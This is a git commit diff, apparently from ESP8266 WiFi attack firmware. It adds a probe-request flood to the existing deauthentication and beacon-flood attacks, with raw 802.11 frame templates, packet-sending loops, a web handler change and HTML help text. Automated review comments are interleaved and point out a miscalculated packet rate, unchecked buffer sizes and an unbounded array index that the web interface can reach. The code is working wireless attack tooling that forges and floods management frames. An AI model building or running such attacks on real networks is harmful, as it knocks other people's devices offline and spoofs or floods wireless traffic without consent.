Added Probe Request Attack

Stefan Kremser
2017-03-10 20:24:32 +01:00
parent 42058cf872
commit 141c9f17a3
5 changed files with 94 additions and 26 deletions


@@ -5,7 +5,7 @@ Attack::Attack(){
} }
void Attack::generate(){ void Attack::generate(){
if(debug) Serial.print("generating Macs..."); if(debug) Serial.print("\n generating Macs...");
Mac _randomBeaconMac; Mac _randomBeaconMac;
uint8_t _randomMacBuffer[6]; uint8_t _randomMacBuffer[6];
@@ -80,6 +80,24 @@ void Attack::buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt){
} }
void Attack::buildProbe(String _ssid, Mac _mac){
int len = _ssid.length();
if(len > 32) len = 32;
packetSize = 0;
for(int i=0;i<sizeof(probePacket);i++) packet[packetSize+i] = probePacket[i];
packetSize += sizeof(probePacket);
for(int i=0;i<6;i++) packet[10+i] = _mac._get(i);
packet[packetSize] = len;
packetSize++;
for(int i=0;i<len;i++) packet[packetSize+i] = _ssid[i];
packetSize += len;
}
bool Attack::send(){ bool Attack::send(){
if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){ if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){
/* /*
@@ -101,7 +119,7 @@ void Attack::run(){
/* =============== Deauth Attack =============== */ /* =============== Deauth Attack =============== */
if(isRunning[0] && currentMillis-prevTime[0] >= 1000){ if(isRunning[0] && currentMillis-prevTime[0] >= 1000){
if(debug) Serial.print("running "+(String)attackNames[0]+" attack"); if(debug) Serial.print("running "+(String)attackNames[0]+" attack...");
prevTime[0] = millis(); prevTime[0] = millis();
for(int a=0;a<apScan.results;a++){ for(int a=0;a<apScan.results;a++){
@@ -150,7 +168,7 @@ void Attack::run(){
/* =============== Beacon clone Attack =============== */ /* =============== Beacon clone Attack =============== */
if(isRunning[1] && currentMillis-prevTime[1] >= 100){ if(isRunning[1] && currentMillis-prevTime[1] >= 100){
if(debug) Serial.print("running "+(String)attackNames[1]+" attack"); if(debug) Serial.print("running "+(String)attackNames[1]+" attack...");
prevTime[1] = millis(); prevTime[1] = millis();
for(int a=0;a<apScan.results;a++){ for(int a=0;a<apScan.results;a++){
@@ -193,7 +211,7 @@ void Attack::run(){
generate(); generate();
macListChangeCounter = 0; macListChangeCounter = 0;
} }
if(debug) Serial.println(" done "); if(debug) Serial.println(" done");
if(settings.attackTimeout > 0){ if(settings.attackTimeout > 0){
attackTimeoutCounter[1]++; attackTimeoutCounter[1]++;
if(attackTimeoutCounter[1]/10 > settings.attackTimeout) stop(1); if(attackTimeoutCounter[1]/10 > settings.attackTimeout) stop(1);
@@ -202,7 +220,7 @@ void Attack::run(){
/* =============== Beacon list Attack =============== */ /* =============== Beacon list Attack =============== */
if(isRunning[2] && currentMillis-prevTime[2] >= 100){ if(isRunning[2] && currentMillis-prevTime[2] >= 100){
if(debug) Serial.print("running "+(String)attackNames[2]+" attack"); if(debug) Serial.print("running "+(String)attackNames[2]+" attack...");
prevTime[2] = millis(); prevTime[2] = millis();
for(int a=0;a<ssidList.len;a++){ for(int a=0;a<ssidList.len;a++){
@@ -216,17 +234,41 @@ void Attack::run(){
stati[2] = (String)(packetsCounter[2]*10)+"pkts/s"; stati[2] = (String)(packetsCounter[2]*10)+"pkts/s";
packetsCounter[2] = 0; packetsCounter[2] = 0;
/*macListChangeCounter++; macListChangeCounter++;
if(macListChangeCounter/10 >= macChangeInterval && macChangeInterval > 0){ if(macListChangeCounter/10 >= macChangeInterval && macChangeInterval > 0){
generate(); generate();
macListChangeCounter = 0; macListChangeCounter = 0;
}*/ }
if(debug) Serial.println("done"); if(debug) Serial.println(" done");
if(settings.attackTimeout > 0){ if(settings.attackTimeout > 0){
attackTimeoutCounter[2]++; attackTimeoutCounter[2]++;
if(attackTimeoutCounter[2]/10 > settings.attackTimeout) stop(2); if(attackTimeoutCounter[2]/10 > settings.attackTimeout) stop(2);
} }
} }
/* =============== Probe Request Attack =============== */
if(isRunning[3] && currentMillis-prevTime[3] >= 1000){
if(debug) Serial.print("running "+(String)attackNames[3]+" attack...");
prevTime[3] = millis();
for(int a=0;a<ssidList.len;a++){
buildProbe(ssidList.get(a), beaconAdrs._get(a));
if(send()) packetsCounter[3]++;
}
stati[3] = (String)(packetsCounter[3]*10)+"pkts/s";
packetsCounter[3] = 0;
macListChangeCounter++;
if(macListChangeCounter >= macChangeInterval && macChangeInterval > 0){
generate();
macListChangeCounter = 0;
}
if(debug) Serial.println("done");
if(settings.attackTimeout > 0){
attackTimeoutCounter[3]++;
if(attackTimeoutCounter[3] > settings.attackTimeout) stop(3);
}
}
} }
@@ -239,15 +281,23 @@ void Attack::start(int num){
prevTime[num] = millis(); prevTime[num] = millis();
attackTimeoutCounter[num] = 0; attackTimeoutCounter[num] = 0;
refreshLed(); refreshLed();
if(debug) Serial.println("starting "+(String)attackNames[num]+" attack"); if(debug) Serial.println("starting "+(String)attackNames[num]+" attack...");
if(num == 1 && isRunning[2]) stop(2); if(num == 1){
else if(num == 2 && isRunning[1]) stop(1); stop(2);
stop(3);
} else if(num == 2){
stop(1);
stop(3);
} else if(num == 3){
stop(1);
stop(2);
}
}else stop(num); }else stop(num);
} }
void Attack::stop(int num){ void Attack::stop(int num){
if(isRunning[num]){ if(isRunning[num]){
if(debug) Serial.println("stopping "+(String)attackNames[num]+" attack"); if(debug) Serial.println("stopping "+(String)attackNames[num]+" attack...");
isRunning[num] = false; isRunning[num] = false;
stati[num] = "ready"; stati[num] = "ready";
prevTime[num] = millis(); prevTime[num] = millis();
@@ -265,7 +315,7 @@ String Attack::getResults(){
for(int i=0;i<attacksNum;i++) if(!isRunning[i]) stati[i] = "ready"; for(int i=0;i<attacksNum;i++) if(!isRunning[i]) stati[i] = "ready";
if(apScan.getFirstTarget() < 0) stati[0] = stati[1] = "no AP"; if(apScan.getFirstTarget() < 0) stati[0] = stati[1] = "no AP";
if(ssidList.len < 1) stati[2] = "no SSID"; if(ssidList.len < 1) stati[2] = stati[3] = "no SSID";
int _selected; int _selected;
String json = "{ \"aps\": ["; String json = "{ \"aps\": [";
@@ -311,7 +361,7 @@ String Attack::getResults(){
json += "}"; json += "}";
if(debug){ if(debug){
Serial.println(json); Serial.println(json);
Serial.println("done "); Serial.println("done");
} }
return json; return json;
} }
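Review bot: The status line in the new probe-request block of `Attack::run()` still multiplies by ten, `stati[3] = (String)(packetsCounter[3]*10)+"pkts/s";`, although that block fires once per 1000 ms rather than every 100 ms like the beacon blocks, so the reported rate is ten times too high. The `/10` was already dropped from the timeout and MAC-change counters in the same block, so the status line should follow suit: `stati[3] = (String)packetsCounter[3]+"pkts/s";`. In the same loop `beaconAdrs._get(a)` is indexed up to `ssidList.len`, and `buildProbe` writes up to 58 bytes (25 + 1 + 32) into `packet` with no check against its capacity. Neither limit is declared on this page, so both are worth confirming or guarding explicitly. `run()` begins and ends outside the hunks shown.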


@@ -14,7 +14,7 @@ extern "C" {
#include "Settings.h" #include "Settings.h"
#include "SSIDList.h" #include "SSIDList.h"
#define attacksNum 3 #define attacksNum 4
#define macListLen 64 #define macListLen 64
#define macChangeInterval 4 #define macChangeInterval 4
@@ -43,10 +43,11 @@ class Attack
void buildDeauth(Mac _ap, Mac _client, uint8_t type, uint8_t reason); void buildDeauth(Mac _ap, Mac _client, uint8_t type, uint8_t reason);
void buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt); void buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt);
void buildProbe(String _ssid, Mac _mac);
bool send(); bool send();
//attack declarations //attack declarations
const String attackNames[attacksNum] = {"deauth","beacon (clone)","beacon (list)"}; const String attackNames[attacksNum] = {"deauth", "beacon (clone)", "beacon (list)", "probe request"};
//attack infos //attack infos
String stati[attacksNum]; String stati[attacksNum];
@@ -107,6 +108,19 @@ class Attack
0x00, 0x00 //RSN capabilities 0x00, 0x00 //RSN capabilities
}; };
uint8_t probePacket[25] = {
/* 0 - 1 */ 0x40, 0x00, //Type: Probe Request
/* 2 - 3 */ 0x00, 0x00, //Duration: 0 microseconds
/* 4 - 9 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //Destination: Broadcast
/* 10 - 15 */ 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //Source: random MAC
/* 16 - 21 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //BSS Id: Broadcast
/* 22 - 23 */ 0x00, 0x00, //Sequence number (will be replaced by the SDK)
/* 24 */ 0x00 //Tag Number: SSID parameter set (0)
/* ,0x06, //Tag length
0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA //SSID
*/
};
int macListChangeCounter = 0; int macListChangeCounter = 0;
int attackTimeoutCounter[attacksNum]; int attackTimeoutCounter[attacksNum];
int channels[macListLen]; int channels[macListLen];
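Review bot: `probePacket` is declared as a mutable per-object array, but the only use visible on this page, `buildProbe`, reads it as a template and copies it into `packet`. Declaring it `const uint8_t probePacket[25]` would document that and stop accidental writes, assuming nothing outside this page modifies it. The commented-out tag length and SSID bytes inside the initializer read like dead code; a one-line comment such as `// tag length and SSID bytes are appended by buildProbe()` would say why the template stops at byte 24. The source-MAC offset that `buildProbe` hard-codes as `packet[10+i]` depends on this layout, so a named constant next to the array would keep the two in step.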

File diff suppressed because one or more lines are too long


@@ -213,7 +213,7 @@ void sendAttackInfo() {
void startAttack() { void startAttack() {
if (server.hasArg("num")) { if (server.hasArg("num")) {
int _attackNum = server.arg("num").toInt(); int _attackNum = server.arg("num").toInt();
if (apScan.getFirstTarget() > -1 || _attackNum == 2) { if (apScan.getFirstTarget() > -1 || _attackNum == 2 || _attackNum == 3) {
attack.start(server.arg("num").toInt()); attack.start(server.arg("num").toInt());
server.send ( 200, "text/json", "true"); server.send ( 200, "text/json", "true");
} else server.send( 200, "text/json", "false"); } else server.send( 200, "text/json", "false");
@@ -323,4 +323,4 @@ void editClientName() {
server.send( 200, "text/json", "true"); server.send( 200, "text/json", "true");
} }
} }
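Review bot: `_attackNum` in `startAttack()` comes straight from the `num` request argument and is never range-checked before `attack.start()` uses it as an array index. Whenever `apScan.getFirstTarget() > -1` holds, any integer passes the condition, and `start(num)` then indexes `isRunning[num]`, `attackTimeoutCounter[num]` and `attackNames[num]`, which the header sizes with `attacksNum`. A negative or too-large value is therefore an out-of-bounds read and write reachable from the web interface. The guard should bound the value first, and the call should reuse the parsed value instead of parsing the argument again: `if (_attackNum >= 0 && _attackNum < attacksNum && (apScan.getFirstTarget() > -1 || _attackNum == 2 || _attackNum == 3)) {` followed by `attack.start(_attackNum);`. `startAttack()` continues past the end of the hunk.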


@@ -43,16 +43,20 @@
</table> </table>
<p class="small"> <p class="small">
<br> <br />
<b>deauth [deauthentication attack]:</b><br> <b>deauth [deauthentication attack]:</b><br />
Sends deauthentication frames and dissociation frames to the selected client(s) in the selected WiFi access point(s). Sends deauthentication frames and dissociation frames to the selected client(s) in the selected WiFi access point(s).
<br> <br />
<b>Note: </b> <b>Note: </b>
If no client is selected, the packets are sent as broadcast! If no client is selected, the packets are sent as broadcast!
<br><br> <br /><br />
<b>beacon [beacon flood attack]:</b><br> <b>beacon [beacon flood attack]:</b><br />
(clone:) spams beacon frames with a similar SSID as the selected WiFi access point(s).<br /> (clone:) Spams beacon frames with a similar SSID as the selected WiFi access point(s).<br />
(list:) spams beacon frames with all SSIDs in the list below. (list:) Spams beacon frames with all SSIDs in the list below.
<br /><br />
<b>probe request [probe request flood attack]:</b><br />
Spams probe request frames with all SSIDs in the list below.<br />
Usefull to confuse and spam WiFi trackers.
</p> </p>
<br /> <br />
<p class="block bold">SSIDs: <span id="ssidCounter">0/64</span> <button class="marginNull warnBtn" onclick="clearSSID()">clear</button> <button class="marginNull" onclick="randomSSID()">random</button> <button class="marginNull" onclick="cloneSSID()">clone</button> <button class="marginNull" onclick="addSSID()">add</button></p> <p class="block bold">SSIDs: <span id="ssidCounter">0/64</span> <button class="marginNull warnBtn" onclick="clearSSID()">clear</button> <button class="marginNull" onclick="randomSSID()">random</button> <button class="marginNull" onclick="cloneSSID()">clone</button> <button class="marginNull" onclick="addSSID()">add</button></p>